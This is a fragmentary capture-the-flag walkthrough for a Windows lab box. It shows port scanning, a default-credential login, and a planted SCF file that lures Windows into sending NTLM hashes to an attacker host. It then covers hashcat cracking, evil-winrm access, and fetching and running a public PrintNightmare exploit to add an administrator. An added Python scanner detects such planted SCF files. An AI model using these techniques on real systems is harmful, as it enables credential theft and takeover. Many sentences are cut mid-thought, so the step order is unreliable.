`nmap`. We can quickly scan for open ports and store them in a variable:
`ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.106 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)`. Then, we can scan those specific ports in depth by running
`nmap`'s built-in scripts:
`nmap -p$ports -sC -sV 10.10.11.106`.
`admin:admin` to sign in works. There is a
`fw_up.php` page where we can upload firmware, but there doesn't seem to be an accessible location where those files get uploaded to.
`ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.10.11.106/FUZZ`.
135, which is for Samba. According to Wikipedia, "Server Message Block (SMB) is a communication protocol that Microsoft created for providing shared access to files and printers across nodes on a network." Since the other two ports look like dead ends for now, we must be able to find something here. Maybe the files are being uploaded to the Samba share, which would mean we have write access to that share without any credentials.
`X.X.X.X` to our attacker's IP address. Since the
`IconFile` field is set to a UNC path, Windows will request the icon from the attacker's host and try to authenticate with the user's credentials; the attacker's listener then issues a challenge, and Windows returns a challenge response containing the NTLM hash.
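As an added defensive example (not part of the original writeup), the following Python script scans a share or upload directory for `.scf` files whose `IconFile` entry points at a UNC path, which is the artifact the technique above leaves on the share; the directory layout, hostnames and IPs are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Matches an IconFile= entry whose value is a UNC path (\\host\share\...),
# the form that makes Explorer contact "host" and authenticate with NTLM.
UNC_ICON_RE = re.compile(r"^\s*IconFile\s*=\s*\\\\([^\\\s]+)\\",
                         re.IGNORECASE | re.MULTILINE)


def scf_unc_hosts(text: str) -> list[str]:
    """Return the hosts referenced by UNC IconFile entries in one SCF file's text."""
    return UNC_ICON_RE.findall(text)


def scan_share(root: Path, trusted_hosts=frozenset()) -> list[tuple[str, str]]:
    """Walk a share (or upload directory) and report .scf files whose icon would
    be fetched from a host not in trusted_hosts. Returns (relative path, host)."""
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() != ".scf":
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        for host in scf_unc_hosts(text):
            if host.lower() not in trusted_hosts:
                findings.append((str(path.relative_to(root)), host))
    return findings


def demo() -> list[tuple[str, str]]:
    """Constructed sample share: one planted SCF pointing at an untrusted host,
    one legitimate SCF pointing at the (hypothetical) corporate icon server."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "notes.scf").write_text("[Shell]\r\nIconFile=\\\\192.0.2.10\\share\\x.ico\r\n")
        (root / "ok.scf").write_text("[Shell]\r\nIconFile=\\\\fileserver01\\icons\\corp.ico\r\n")
        (root / "readme.txt").write_text("nothing here\n")
        return scan_share(root, {"fileserver01"})


if __name__ == "__main__":
    for rel, host in demo():
        print(f"suspicious: {rel} fetches its icon from {host}")
```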
`fw_up.php`) on port 80.
`hashcat`. We first find the
`hashcat` mode needed for NTLMv2 hashes with
`hashcat --help | grep NTLMv2`, which shows us the correct mode is
`hash` and then run
`hashcat -a 0 -m 5600 hash rockyou.txt`:
`evil-winrm` we can simply run the
`upload /home/kali/Downloads/winPEASx64.exe`. We can run it with
`.\winPEASx64.exe`. This doesn't give any easy wins.
`evil-winrm` on the target run:
`upload e.exe` and then
`background` to get back to the
`msfconsole`. Then run
`use post/multi/recon/local_exploit_suggester` and set the session with
`set session 1`, then
`run` to get a list of possible exploits. This reveals nothing.
`CVE-2021-34527`, or PrintNightmare. After enough searching one may find this exploit because the
`spoolsv` service is running, as shown in WinPEAS's "Current TCP Listening Ports" output (and when simply running
`wget https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/CVE-2021-1675.ps1` and then upload it to the target with our
`evil-winrm` connection by running
`upload CVE-2021-1675.ps1`. Then, run
`set-ExecutionPolicy RemoteSigned -Scope CurrentUser` so you don't get the "execution of scripts is disabled on this system" error message (StackOverflow answer where the command was found). Now, we can launch the exploit:
`[!] failed to get current driver list` error message, but after resetting the box it worked:
`evil-winrm` as our newly created administrator
`evil-winrm -u john -p SuperSecure -i 10.10.11.106`. We can get the